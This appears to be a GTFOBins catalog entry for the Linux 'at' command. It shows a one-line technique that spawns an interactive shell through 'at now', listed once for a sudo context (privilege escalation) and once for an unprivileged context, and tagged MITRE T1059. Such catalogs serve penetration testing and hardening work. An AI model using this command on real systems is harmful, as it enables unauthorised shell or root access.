Catalog GTFOBins

GTFO · Tool

at

4 techniques LinuxGTFOBins GPL-3.0

shell

ExecutionPrivilege Escalation Linux

`tail` is used to pause the terminal.

echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | at now; tail -f /dev/null
Context
sudo
Native
shell
MITRE
T1059

shell

Execution Linux

`tail` is used to pause the terminal.

echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | at now; tail -f /dev/null
Context
unprivileged
Native
shell
MITRE
T1059